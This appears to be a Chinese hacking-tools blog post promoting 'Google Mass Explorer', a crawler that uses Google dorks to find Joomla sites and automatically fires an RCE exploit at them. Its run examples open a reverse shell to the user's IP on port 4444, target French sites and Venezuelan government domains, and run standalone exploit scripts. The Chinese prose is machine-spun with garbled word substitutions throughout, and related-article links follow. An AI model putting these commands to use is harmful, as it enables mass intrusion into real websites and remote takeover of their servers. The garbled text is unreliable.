好用的Google缝隙爬虫:Google Mass Explorer

访客5年前黑客工具1273


这是一款根据谷歌搜索引擎的自动化爬虫。
爬虫介绍
爬虫大体机制便是:
先进行一次谷歌搜索,将成果解析为特定格局,然后再提供给exp运用。
我们能够测验运用–help来列出一切参数。
这个项目笔者会持续更新,今后再增加新的exp进行晋级。此外,它会运用google_parsers模块去构建exp解析搜索成果,所以当你开端搜索时,能够挑选“–exploit parser”参数来指定相应exp。
google parsers模块(google_parsers.py)今后还会持续优化,而现在的exp只含有joomla cve,究竟这个项目首要是给我们自己diy运用的。可是,假如你不会弄exp,把运用exp提交给过来也行。
因为笔者平常仍是比较忙,所以没有太多时刻去手动搜索方针。故而,笔者测验运用Selenium框架去造了个爬虫来查找测验方针。至于搜索过程中呈现的Google的验证码,它需求其他库和模块来辅佐处理。在项目里运用Selenium后,我们就能够在谷歌呈现验证码的是时分,自行手动输入验证码,然后爬虫就能够持续爬行了。这大概是笔者能想出的更好的处理验证码防护的办法了。
简略概述下爬虫是怎么作业的:
1. 履行谷歌搜索
2. 从每一页解析成果
3. 测验是否成果中含有缝隙
依靠与需求
这个项目需求python3,运用requirements装置依靠库的办法如下:
$ sudo pip install -r requirements.txt
运转示例:
python3 google_explorer.py --dork="site:*.com inurl:index.php?option=" --browser="chrome" --exploit_parser="joomla_15_12_2019_rce" --revshell="MY_PUBLIC_IP" --port=4444 --google_domain="google.com" --location="França" --last_update="no último mês"
在上面的比方里,笔者是在寻觅法国的joomla RCE方针,运用的是google_domains.txt里边的google域名(比方google.co.uk)来作为搜索引擎,“–last_update”则代表着搜索成果的更新时刻为上个月。
上面比方里的选项适用于任何言语,首要决定于google针对相应的国家给出的语法。
下面再给出一个简略的比方:
python3 google_explorer.py --browser='chrome' --dork='site:gob.ve inurl:index.php' --location="Venezuela"
当然,这些exp也是能够独自运用的:
$ cd xpl_parsers
$ python joomla_cve_2019_8562.py
独自测验exp的办法:
$ cd exploits
$ python exploiter.py --file
 

相关文章

黑客入侵又出新招!丹麦科学研究精英团队探索与发现:不连接网络

黑客入侵又出新招!丹麦科学研究精英团队探索与发现:不连接网络

针对网络黑客而言,沒有她们没法做到,唯有你意想不到。   就算不连接网络,网络黑客运用散热风扇也可以盗取你的数据信息? 前不久,非洲的一个科学研究精...

怎么打造“钢筋混凝土”型的网络环境

简化、优化你的补丁办理 许多进犯机制,都是针对未修补的体系。所以,不论你的网络是否对外开放,都应该定时更新操作体系和应用程序。尽管这个主张归于陈词滥调,但从另一个旁边面也说明晰该主张的重要性。 关于W...

Brida:运用Frida进行移动使用浸透测验

Brida是一款 Burp Suite 扩展,作为一座桥梁衔接着Burp Suite以及Frida,以协助用户修正运用程序与后端服务器之间的通讯数据为己任。在剖析移动端运用时遇到运用运用随机密钥式对称...

30秒攻破恣意密码保护的PC:深化了解5美元黑客神器PoisonTap

近来,闻名硬件黑客Samy Kamkar运用5美元设备打造的黑客东西PoisonTap,只需30秒,就可以攻破设置有恣意暗码的电脑体系,并完成长时间后门装置。PoisonTap不是暴力破解暗码,而是...

浏览器进犯结构BeEF Part 2:初始化操控

前语 在上一章,笔者现已介绍了BeEF结构。在这一章,笔者将介绍进犯阅读器技能的第一步:初始操控。 阅读器进犯办法流程 进犯阅读器一般分为几个阶段,看下图: 整个进程分为三个过程,第一步是初始化操控,...

怎么全面防护Webshell(下)?

 在进行查询时,最要害的部分之一是找到黑客的进口点,尤其是当运维团队将受进犯的服务器康复正常后,咱们意识到有许多的服务器现已被各种webshell、rootkits和暗码导出东西感染时。 需求快速的...